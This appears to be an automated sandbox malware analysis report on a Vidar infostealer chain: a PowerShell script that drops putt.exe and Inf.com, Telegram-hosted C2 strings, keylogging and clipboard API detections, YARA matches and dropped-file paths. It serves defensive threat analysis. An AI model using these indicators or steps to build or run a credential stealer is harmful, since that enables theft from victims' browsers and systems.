Source: Inf.com, 00000012.00000002.3022504782.0000000004C1C000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 00000012.00000003.2351615242.00000000019D9000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 00000012.00000002.3021593436.0000000001A33000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 00000012.00000003.2351564901.0000000001A3B000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 00000012.00000003.2351446315.0000000004BF1000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 00000012.00000002.3019523263.00000000003DD000.00000040.00001000.00020000.00000000.sdmp, Inf.com, 00000012.00000003.2351511068.0000000004A7C000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 00000012.00000003.2351416495.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 00000012.00000002.3022504782.0000000004BF0000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 00000012.00000002.3019523263.0000000000391000.00000040.00001000.00020000.00000000.sdmp, Inf.com, 00000012.00000003.2351644907.0000000001A58000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 00000012.00000002.3021593436.0000000001960000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/k04ael
Source: Inf.com, 00000012.00000002.3022504782.0000000004C1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.me/k04ael_
Source: Inf.com, 00000012.00000002.3021593436.0000000001960000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/k04aelm0nk3Mozilla/5.0
Source: Inf.com, 00000012.00000002.3022504782.0000000004C1C000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 00000012.00000002.3019523263.00000000003DD000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.org
Source: Inf.com, 00000012.00000002.3025048546.0000000006C2B000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 00000012.00000002.3022504782.0000000004CD1000.00000004.00000800.00020000.00000000.sdmp, WT2NOZ.18.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: Subtle.14.dr, Inf.com.7.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: chrome.exe, 00000015.00000003.2593082155.00000ED800C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2599700581.00000ED800C34000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=
Source: chrome.exe, 00000015.00000003.2593082155.00000ED800C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2599700581.00000ED800C34000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
Source: chrome.exe, 00000015.00000003.2593082155.00000ED800C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2599700581.00000ED800C34000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
Source: Inf.com, 00000012.00000002.3025048546.0000000006C2B000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 00000012.00000002.3022504782.0000000004CD1000.00000004.00000800.00020000.00000000.sdmp, WT2NOZ.18.dr	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: Inf.com.7.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: chrome.exe, 00000015.00000003.2573874031.00000ED800294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com
Source: chrome.exe, 00000015.00000003.2573874031.00000ED800294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: chrome.exe, 00000015.00000003.2573874031.00000ED800294000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550191894.00000ED800C34000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: chrome.exe, 00000015.00000003.2550102367.00000ED800CCC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000015.00000003.2583975141.00000ED80280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
Source: chrome.exe, 00000015.00000003.2583975141.00000ED80280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
Source: chrome.exe, 00000015.00000003.2596195396.00000ED803028000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2596141624.00000ED80300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2595487527.00000ED802FA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2596235017.00000ED801C14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/imghp?hl=en&tab=ri&ogbl
Source: chrome.exe, 00000015.00000003.2596235017.00000ED801C14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
Source: chrome.exe, 00000015.00000003.2583975141.00000ED80280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search
Source: chrome.exe, 00000015.00000003.2556074286.00000ED8010C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=$
Source: chrome.exe, 00000015.00000003.2573874031.00000ED800294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
Source: chrome.exe, 00000015.00000003.2583975141.00000ED80280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/aida2
Source: chrome.exe, 00000015.00000003.2591906960.00000ED8029E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2591792926.00000ED8029D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
Source: chrome.exe, 00000015.00000003.2583975141.00000ED80280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
Source: chrome.exe, 00000015.00000003.2583975141.00000ED80280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
Source: chrome.exe, 00000015.00000003.2573874031.00000ED800294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: chrome.exe, 00000015.00000003.2573874031.00000ED800294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: chrome.exe, 00000015.00000003.2596235017.00000ED801C14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000015.00000003.2596195396.00000ED803028000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2596141624.00000ED80300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2595800763.00000ED800F40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2595727393.00000ED803058000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2596235017.00000ED801C14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000015.00000003.2595764404.00000ED803044000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2595394676.00000ED8030C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2595463775.00000ED8030D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2596235017.00000ED801C14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp
Source: chrome.exe, 00000015.00000003.2595764404.00000ED803044000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2595394676.00000ED8030C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2595463775.00000ED8030D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2596235017.00000ED801C14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd
Source: Inf.com, 00000012.00000002.3025565970.0000000006F07000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: Inf.com, 00000012.00000002.3025565970.0000000006F07000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: Inf.com, 00000012.00000002.3025565970.0000000006F07000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: Inf.com, 00000012.00000002.3025565970.0000000006F07000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Inf.com, 00000012.00000002.3025565970.0000000006F07000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49940
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49934
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49930
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49940 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49910
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49903
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49903 -> 443

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.245.216.205:443 -> 192.168.2.4:49760 version: TLS 1.2

Contains functionality for read data from the clipboard

Source: C:\Users\user\AppData\Local\Temp\putt.exe

Code function: 5_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

5_2_004050F9

Contains functionality to modify clipboard data

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Code function: 18_2_0091F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

18_2_0091F7C7

Contains functionality to read the clipboard data

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Code function: 18_2_0091F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

18_2_0091F55C

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Users\user\AppData\Local\Temp\putt.exe

Code function: 5_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

5_2_004044D1

Potential key logger detected (key state polling based)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Code function: 18_2_00939FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

18_2_00939FD2

System Summary

Malicious sample detected (through community Yara rule)

Source: 18.2.Inf.com.390000.0.unpack, type: UNPACKEDPE

Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lem[1].exe			Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\putt.exe			Jump to dropped file

Abnormal high CPU Usage

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Process Stats: CPU usage > 49%

Contains functionality to call native functions

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Code function: 18_2_008BFFE0 CloseHandle,NtProtectVirtualMemory,

18_2_008BFFE0

Contains functionality to communicate with device drivers

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Code function: 18_2_00914763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,

18_2_00914763

Contains functionality to launch a process as a different user

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Code function: 18_2_00901B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

18_2_00901B4D

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\AppData\Local\Temp\putt.exe	Code function: 5_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,		5_2_004038AF
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_0090F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		18_2_0090F20D

Creates files inside the system directory

Source: C:\Users\user\AppData\Local\Temp\putt.exe	File created: C:\Windows\NortheastPresence	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	File created: C:\Windows\FascinatingFee	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	File created: C:\Windows\FinishedMistress	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Detected potential crypto function

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD9AF9785D	0_2_00007FFD9AF9785D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD9AF96880	0_2_00007FFD9AF96880
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD9B24095D	0_2_00007FFD9B24095D
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Code function: 5_2_0040737E	5_2_0040737E
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Code function: 5_2_00406EFE	5_2_00406EFE
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Code function: 5_2_004079A2	5_2_004079A2
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Code function: 5_2_004049A8	5_2_004049A8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008C8017	18_2_008C8017
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008AE1F0	18_2_008AE1F0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008BE144	18_2_008BE144
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008A22AD	18_2_008A22AD
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008C22A2	18_2_008C22A2
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008DA26E	18_2_008DA26E
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008BC624	18_2_008BC624
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_0092C8A4	18_2_0092C8A4
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008DE87F	18_2_008DE87F
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008D6ADE	18_2_008D6ADE
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_00912A05	18_2_00912A05
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_00908BFF	18_2_00908BFF
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008BCD7A	18_2_008BCD7A
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008CCE10	18_2_008CCE10
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008D7159	18_2_008D7159
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008A9240	18_2_008A9240
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_00935311	18_2_00935311
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008A96E0	18_2_008A96E0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008C1704	18_2_008C1704
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008C1A76	18_2_008C1A76
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008C7B8B	18_2_008C7B8B
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008A9B60	18_2_008A9B60
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008C7DBA	18_2_008C7DBA
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008C1D20	18_2_008C1D20
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008C1FE7	18_2_008C1FE7

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: String function: 008C0DA0 appears 46 times
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: String function: 008BFD52 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Code function: String function: 004062CF appears 58 times

Yara signature match

Source: 18.2.Inf.com.390000.0.unpack, type: UNPACKEDPE

Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76

Source: Q9R1NG.18.dr

Binary string: #WriteOfflineHivesTerminateSetupModuleds\security\cryptoapi\cryptosetup\cryptosetup.cDCryptoSetup module terminatedCryptoSetupNewRegistryCallBackCryptoSetup EntropyWrite given invalid event typeCryptoSetup EntropyWrite given invalid event data sizeWriteEntropyToNewRegistryCryptoSetup failed to get Ksecdd entropy %08xRNGCryptoSetup failed to open system hive key %08xExternalEntropyCryptoSetup failed to write entropy into the system hive %08xCryptoSetup failed to close system hive key %08xCryptoSetup succeeded writing entropy key\Device\KsecDDWriteCapiMachineGuidCryptoSetup failed get entropy from ksecdd for CAPI machine guid %08x%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02xCryptoSetup failed to convert CAPI machine guid to string %08xMicrosoft\CryptographyCryptoSetup failed get open/create reg key for CAPI machine guid %08xMachineGuidCryptoSetup failed get write CAPI machine guid %08xCryptoSetup assigned CAPI machine guid "%s"

Source: classification engine

Classification label: mal100.troj.spyw.evad.winPS1@47/55@5/7

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Code function: 18_2_009141FA GetLastError,FormatMessageW,

18_2_009141FA

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_00902010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		18_2_00902010
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_00901A0B AdjustTokenPrivileges,CloseHandle,		18_2_00901A0B

Source: C:\Users\user\AppData\Local\Temp\putt.exe

5_2_004044D1

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Code function: 18_2_0090DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

18_2_0090DD87

Source: C:\Users\user\AppData\Local\Temp\putt.exe

Code function: 5_2_004024FB CoCreateInstance,

5_2_004024FB

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Code function: 18_2_00913A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

18_2_00913A0E

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7324:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7836:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cumjcpwa.1xy.ps1

Jump to behavior

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\findstr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: 2D2VASR9H.18.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\script.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\putt.exe "C:\Users\user\AppData\Local\Temp\putt.exe"
